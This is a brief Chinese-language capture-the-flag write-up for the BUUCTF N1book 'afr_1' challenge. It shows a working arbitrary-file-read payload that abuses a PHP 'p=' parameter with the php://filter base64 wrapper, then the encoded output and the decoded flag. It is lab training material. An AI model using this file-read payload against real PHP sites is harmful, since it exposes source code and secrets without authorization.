buuctf N1book
ok,让我们继续看看 buuctf N1book
afr_1 任意文件读取
打开靶机,发现url上有提示"p="为任意文件读取,利用php伪协议php://filter/read=convert.base64-encode/resource=index.php
?p=php://filter/read=convert.base64-encode/resource=flag(此时无后缀,因为原题p=hello无后缀,猜测后台添加后缀)
得到PD9waHAKZGllKCdubyBubyBubycpOwovL24xYm9va3thZnJfMV9zb2x2ZWR9
base解码得到:n1book{afr_1_solved}